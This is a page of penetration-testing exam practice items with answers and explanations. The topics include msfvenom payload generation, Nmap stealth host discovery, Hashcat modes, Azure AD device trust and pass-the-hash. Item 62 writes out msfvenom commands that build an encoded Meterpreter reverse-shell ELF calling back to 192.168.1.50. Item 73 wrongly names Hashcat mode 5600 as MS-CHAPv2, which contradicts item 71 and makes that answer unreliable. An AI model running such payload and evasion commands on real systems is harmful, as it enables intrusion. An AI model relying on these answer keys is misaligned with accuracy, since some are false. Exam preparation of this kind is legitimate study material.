Candidates often jump to complex conclusions like firewall rules or payload encoding issues before verifying the most basic requirement: is the listener actually running and reachable?

62
MCQhard

A penetration tester uses msfvenom to generate a Linux ELF reverse shell payload. The tester wants the payload to connect back to 192.168.1.50 on port 4444 and to embed an encoder that removes null bytes and other bad characters to survive transmission through a constrained channel. Which msfvenom command line correctly produces this payload?

A.msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -f elf -o shell.elf
B.msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -f elf -o shell.elf
C.msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -f elf -o shell.elf --platform windows
D.msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -f exe -o shell.elf
AnswerA

This command selects the Linux reverse TCP payload, sets the callback host and port, applies the shikata_ga_nai encoder, specifies null bytes as bad characters to avoid, and outputs an ELF file. The -b option tells msfvenom to encode the payload so the listed bytes do not appear, which is exactly the requirement for surviving a constrained channel. All parameters align with the scenario.

Why this answer

The correct msfvenom invocation selects the Linux reverse TCP payload, supplies the callback host and port, applies the shikata_ga_nai encoder, declares null bytes as bad characters with -b, and outputs an ELF file. The -b option is what drives the encoder to avoid those bytes in the final payload, which is required for the constrained channel. The other options either omit bad-character handling, use the wrong format, or add a contradictory platform flag.

Exam trap

The trap here is focusing on the encoder flag while overlooking that bad-character exclusion requires the -b option and that the output format must match the target platform.

63
MCQhard

During an assessment, you find that 'Device Writeback' is enabled. What is the security concern regarding the registration of these devices in Azure AD?

A.It allows the cloud to push malware to on-premises devices.
B.It allows untrusted devices to satisfy Conditional Access requirements.
C.It automatically grants the devices administrative access to the cloud tenant.
D.It requires all devices to be hardware-encrypted with TPM 2.0.
AnswerB

Devices synced to Azure AD are marked as 'known' or 'compliant' depending on the policy. If an attacker joins a rogue device to the on-premises domain, it gets synced to the cloud. This device may then be treated as trusted, bypassing security controls that require a 'compliant' or 'managed' device.

Why this answer

Device Writeback registers on-premises devices in Azure AD. If an attacker manages to join an unauthorized device to the domain, it is automatically synchronized to the cloud. Once in the cloud, this device might satisfy Conditional Access requirements, allowing an attacker to bypass device-based security controls.

This expands the trusted device pool, which is a major security loophole if device registration is not tightly controlled.

Exam trap

Candidates often assume 'Device Writeback' is purely a management feature for device inventory. They miss the security implication that trusted status is automatically granted to synchronized on-premises devices.

64
MCQhard

Refer to the exhibit. You executed an Nmap scan against a host and received the output shown. Which scanning technique was most likely used to produce this specific state-based output while avoiding the completion of a full TCP three-way handshake?

A.TCP Connect Scan (-sT)
B.TCP SYN Scan (-sS)
C.UDP Scan (-sU)
D.TCP ACK Scan (-sA)
AnswerB

The SYN scan is the 'half-open' technique that identifies open ports by initiating the handshake but never finishing it. By sending a RST packet upon receiving a SYN/ACK, it avoids creating a full connection entry in the target's socket table, which is the standard behavior for most Nmap scans.

Why this answer

The output indicates open ports without explicitly showing a full connection. Nmap's SYN scan (-sS) is the default and most popular method for this result. It initiates the handshake but sends an RST packet immediately after receiving the SYN/ACK, preventing a full connection.

This technique is essential for testers to map services quickly while remaining stealthier than a full connection-based scan which would be logged by most application-layer firewalls.

Exam trap

Candidates often confuse SYN scans with full TCP connect scans (-sT), forgetting that SYN scans avoid completing the three-way handshake by sending an RST packet.

65
MCQeasy

You are performing a penetration test and need to scan a large Class B network (10.0.0.0/16) for live hosts. You want to minimize the scan time while still getting accurate results. Which Nmap option should you use to perform a ping sweep without port scanning?

A.-sP
B.-sn
C.-sS
D.-P0
AnswerB

-sn (No port scan) tells Nmap to perform only host discovery and skip port scanning. This is the correct and current option for a ping sweep. It sends various probes (ICMP echo, TCP SYN to 443, TCP ACK to 80, ICMP timestamp) to determine if hosts are up, and it is much faster than scanning ports on every host.

Why this answer

The -sn option performs a ping scan (host discovery) without port scanning. It is the current and correct way to do a ping sweep. The other options either perform port scanning, disable host discovery, or use deprecated syntax.

Exam trap

The trap here is using the deprecated -sP instead of -sn; while they may seem similar, -sn is the modern standard and ensures compatibility.

66
MCQmedium

What is the primary danger of using a 'bind shell' payload in a penetration test?

A.It is always detected by local antivirus.
B.It opens a listening port that is easily discovered.
C.It requires the target to have an internet connection.
D.It automatically crashes the target's kernel.
AnswerB

A bind shell makes the target machine a server, opening a port that is visible to any network scan. This increases the risk that other attackers or internal security tools will detect the unexpected listener, and it may be blocked by ingress firewall rules designed to prevent such connections.

Why this answer

A bind shell opens a listening port on the target machine, which is highly visible to firewalls and network monitoring. This makes it an insecure choice, as it allows anyone else on the network to potentially connect to the listener. In a professional engagement, using a reverse shell is preferred, as it initiates the connection from the target back to the tester, which is far more likely to bypass perimeter firewalls.

Exam trap

Candidates often select bind shells because they are easier to configure locally, forgetting that inbound ports are routinely blocked by perimeter firewalls.

67
MCQmedium

During an internal penetration test, an attacker compromises a standard user account in a hybrid Azure AD environment. The organization synchronizes on-premises identities using Azure AD Connect with Pass-Through Authentication enabled. Which technique allows the attacker to compromise additional cloud and on-premises identities without triggering standard cloud MFA prompts?

A.Injecting malicious golden tickets into Azure AD Connect sync engine database tables to forge valid cloud security tokens.
B.Exploiting seamless single sign-on kerberos ticket requests to harvest master keys directly from the Azure AD service bus.
C.Abusing compromised credentials against legacy authentication endpoints or poorly secured client applications that bypass modern conditional access and MFA controls.
D.Modifying the cloud synchronization agent configuration file to downgrade password hashing algorithms from PBKDF2 to plain text.
AnswerC

Pass-through authentication relies on valid directory credentials. When attackers capture these credentials, they often target legacy protocols like POP3, IMAP, or SMTP which traditionally do not enforce modern conditional access policies or multi-factor authentication challenges.

Why this answer

Pass-Through Authentication validates user credentials directly against the on-premises Active Directory by passing the raw credentials through the authentication agent. When an attacker compromises an active session or abuses legacy authentication protocols that bypass conditional access and multi-factor authentication requirements, they can pivot between cloud and on-premises domains seamlessly without triggering supplementary challenges.

Exam trap

Candidates often assume cloud-based conditional access policies automatically intercept all on-premises authentication flows, forgetting that legacy protocols or poorly configured authentication agents can bypass modern multi-factor verification entirely.

68
MCQmedium

During an internal penetration test, you need to discover live hosts on a flat Layer 2 network segment. The client's IDS is known to alert on TCP SYN packets sent to closed ports. You want to minimize the chance of triggering an alert while still identifying as many hosts as possible. Which Nmap host discovery technique should you use?

A.nmap -sn -PS22,80,443 10.10.10.0/24
B.nmap -sn -PA80 10.10.10.0/24
C.nmap -sn -PR 10.10.10.0/24
D.nmap -sn -PE 10.10.10.0/24
AnswerC

ARP ping (-PR) sends ARP requests, which are Layer 2 broadcasts and are not routed or inspected by most network IDS/IPS. On a flat Layer 2 segment, every live host must answer with its MAC address, so this reliably identifies hosts without generating TCP SYN traffic that would trigger the IDS. It is the default host discovery method for local Ethernet targets.

Why this answer

ARP ping is the most reliable and stealthy host discovery method on a local Layer 2 network because ARP requests are broadcast and must be answered by all live hosts. It avoids TCP SYN traffic that would trigger the IDS described. The other options use TCP or ICMP probes that either trigger the IDS or are less reliable on a local segment.

Exam trap

The trap here is assuming that TCP SYN ping to common ports is stealthy, but the scenario explicitly states the IDS alerts on SYN packets to closed ports, making ARP ping the safer choice.

69
MCQmedium

During a penetration test against an internal Windows host, you use Metasploit's psexec module with a Meterpreter payload and receive a session. You then run the getuid command and see that you are running as NT AUTHORITY\SYSTEM. However, when you attempt to access a mapped network drive that the logged-on user had access to, you receive an access denied error. Which of the following best explains this behavior?

A.The Meterpreter session is running in the security context of the SYSTEM account, which has no network credentials for the mapped drive.
B.The psexec module drops the payload into a temporary directory that lacks the necessary permissions to access network shares.
C.The mapped drive was disconnected when the psexec service was created, and you must re-map it manually from the Meterpreter shell.
D.The firewall on the target is blocking SMB traffic from the SYSTEM account, preventing access to the mapped drive.
AnswerA

SYSTEM has no user credentials, so it cannot authenticate to remote resources that require the logged-on user's token. This is why mapped drives and network shares tied to the interactive user are inaccessible from a SYSTEM-level session unless you migrate or steal a token.

Why this answer

When psexec runs a payload as a service, the resulting process runs as NT AUTHORITY\SYSTEM. SYSTEM has no user credentials, so it cannot access network resources that require the logged-on user's authentication. To access those resources, the tester must migrate into a process running under the user's context or steal a token.

Exam trap

The trap here is assuming that SYSTEM-level access automatically grants access to all resources the logged-on user could reach.

70
Multi-Selecthard

During a red team engagement, an operator successfully dumps the LSA secrets and NTDS.dit database from a Windows domain controller. Which TWO advanced password extraction and analysis techniques should the operator prioritize to uncover administrative access vectors? (Choose two)

Select 2 answers
A.Performing offline dictionary and rule-based cracking against extracted NTLM hashes using high-performance GPU clusters.
B.Injecting malicious DLL payloads into the Local Security Authority Subsystem Service to capture plaintext credentials in real-time.
C.Executing Kerberoasting against all user accounts to extract service tickets encrypted with legacy RC4 encryption keys.
D.Leveraging NTDS.dit NTLM hashes to execute Pass-the-Hash attacks for lateral movement across SMB and WinRM services.
E.Running a responder-based LLMNR/NBT-NS poisoning campaign to capture incoming network authentication challenge-response pairs.
AnswersA, D

Cracking NTLM hashes recovered from the NTDS.dit database reveals plaintext passwords utilized by employees and administrators. This is critical for identifying administrative password reuse across external cloud applications and internal boundaries protected by multi-factor authentication.

Why this answer

Extracting credentials from NTDS.dit allows the recovery of NTLM hashes and potentially cleartext passwords stored via reversible encryption. Pass-the-hash utilizes captured NTLM hashes for lateral movement without cracking, while offline dictionary cracking recovers original plaintext passwords for reuse against external portals or multi-factor authentication boundaries where hash reuse fails.

Exam trap

Candidates often focus solely on 'cracking' hashes. They fail to prioritize 'Pass-the-Hash' as an immediate, non-cracking technique that provides instant lateral movement, which is often more efficient for red teamers.

71
MCQmedium

A penetration tester has captured a NetNTLMv2 challenge-response hash from a Windows workstation over SMB. The tester plans to recover the plaintext password offline using Hashcat on a workstation with a dedicated GPU. The hash file is saved as 'capture.txt' in the format 'username::domain:challenge:response:blob'. Which Hashcat mode should the tester specify to correctly crack this hash?

A.Hashcat mode 5500
B.Hashcat mode 5600
C.Hashcat mode 1000
D.Hashcat mode 3000
AnswerB

Hashcat mode 5600 is specifically designed for NetNTLMv2 hashes. The captured format matches the expected input for this mode, allowing the GPU to efficiently compute HMAC-MD5 responses. Using this mode ensures the challenge-response mechanism is properly emulated, enabling successful recovery of the plaintext password. Other modes target different hash types and will fail to parse or crack the hash correctly.

Why this answer

The captured hash is a NetNTLMv2 challenge-response, which requires Hashcat mode 5600. This mode correctly emulates the NetNTLMv2 protocol, allowing the GPU to compute the HMAC-MD5 response for each password candidate. Other modes target different hash types such as NTLM, NetNTLMv1, or LM, and will not parse or crack the hash.

Therefore, mode 5600 is the only correct choice for this scenario.

Exam trap

The trap here is confusing NetNTLMv2 with NTLM or NetNTLMv1, leading to selection of the wrong Hashcat mode.

72
MCQmedium

You are scanning a target and need to avoid triggering a network IPS that signatures on TCP connect scans. You have root privileges and want to perform a stealthy scan that does not complete the TCP three-way handshake. Which Nmap scan type should you use?

A.nmap -sS <target>
B.nmap -sT <target>
C.nmap -sU <target>
D.nmap -sA <target>
AnswerA

A TCP SYN scan (-sS), also known as a half-open scan, sends a SYN packet and analyzes the response without completing the handshake. It is fast, stealthy, and less likely to be logged by the target application. Since you have root privileges, this is the appropriate choice to avoid IPS signatures associated with full connections.

Why this answer

The TCP SYN scan sends a SYN packet and waits for a SYN/ACK or RST response, never completing the three-way handshake. This half-open approach is faster and stealthier than a full connect scan, making it the preferred method to evade IPS signatures that look for completed TCP connections.

Exam trap

The trap here is assuming that any scan without root or any scan type is stealthy, when the key distinction is whether the TCP handshake is completed, which the SYN scan avoids.

73
MCQeasy

During a penetration test, you capture network traffic and obtain an MS-CHAPv2 challenge-response handshake. You want to crack it offline to recover the user's password. Which tool and mode combination is most appropriate for this task?

A.Hashcat mode 5600 (MS-CHAPv2) with a wordlist.
B.Hashcat mode 5500 (NetNTLMv1) with a wordlist.
C.Aircrack-ng with the `-E` option for MS-CHAPv2.
D.John the Ripper with the `--format=netntlm` option.
AnswerA

Hashcat mode 5600 is specifically designed for MS-CHAPv2 challenge-response pairs. It expects the format `username::::response:challenge`. This mode correctly implements the MS-CHAPv2 algorithm to derive the password from the captured handshake. Using a wordlist or rules with this mode is the standard approach for offline cracking of MS-CHAPv2. Thus, this is the correct tool and mode.

Why this answer

MS-CHAPv2 challenge-response handshakes are cracked using Hashcat mode 5600 or John the Ripper's mschapv2 format. Hashcat mode 5600 correctly processes the challenge and response to recover the password. Other modes like 5500 are for different protocols (NetNTLMv1), and tools like Aircrack-ng are for Wi-Fi.

Thus, the appropriate combination is Hashcat mode 5600 with a wordlist.

Exam trap

The trap here is confusing MS-CHAPv2 with NetNTLMv1 or assuming that general-purpose Wi-Fi cracking tools support PPP authentication protocols.

74
MCQmedium

During an internal penetration test you need to enumerate live hosts on a /24 subnet that you suspect is protected by a stateful firewall dropping ICMP echo requests. You want the scan to be fast and you have administrative (root) privileges on your Kali system. Which Nmap command best accomplishes host discovery in this scenario?

A.nmap -sn -PS22,80,443 10.10.10.0/24
B.nmap -sn -PE 10.10.10.0/24
C.nmap -sn -PR 10.10.10.0/24
D.nmap -sS -p 1-1024 10.10.10.0/24
AnswerA

With root privileges, a TCP SYN ping (-PS) to commonly open ports such as 22, 80, and 443 will elicit a SYN/ACK or RST from live hosts even when ICMP is filtered, and -sn disables port scanning so the run stays fast. This directly addresses the firewall that drops echo requests.

Why this answer

A TCP SYN ping to a commonly open port works even when ICMP is filtered because the firewall permits the TCP handshake to legitimate services. Combining -PS with -sn keeps the scan focused on discovery, making it fast and effective against a stateful firewall that drops echo requests.

Exam trap

The trap here is assuming that a ping sweep must use ICMP, when a TCP SYN ping to an open service port is often the reliable discovery method on filtered networks.

75
MCQmedium

A client asks for an 'unannounced' penetration test to test their incident response team. What is the most important preparatory step before commencing this exercise?

A.Ensure that the entire IT staff is informed of the test dates.
B.Obtain written authorization from a senior executive who can stop the test.
C.Launch the test during a holiday weekend to minimize user disruption.
D.Use only low-impact passive scanning to avoid triggering alarms.
AnswerB

Obtaining written authorization from a senior executive is a mandatory safety precaution for unannounced testing. It ensures that there is a senior point of contact who understands the nature of the activity and has the authority to intervene if the testing activity causes unexpected or critical system issues.

Why this answer

An unannounced test simulates a real-world breach, but it carries significant risk to business operations if the responders block legitimate internal traffic or if the testers are arrested by physical security. Ensuring that at least one senior decision-maker, such as the CISO, is aware of the test is vital. This provides a 'safe harbor' and a mechanism to immediately stop the test if it causes unintended consequences.

Exam trap

Candidates often prioritize notifying the IT department or security staff, forgetting that the ultimate authority to stop a potentially disruptive test must rest with executive leadership.

Page 1 of 4

Page 2

All pages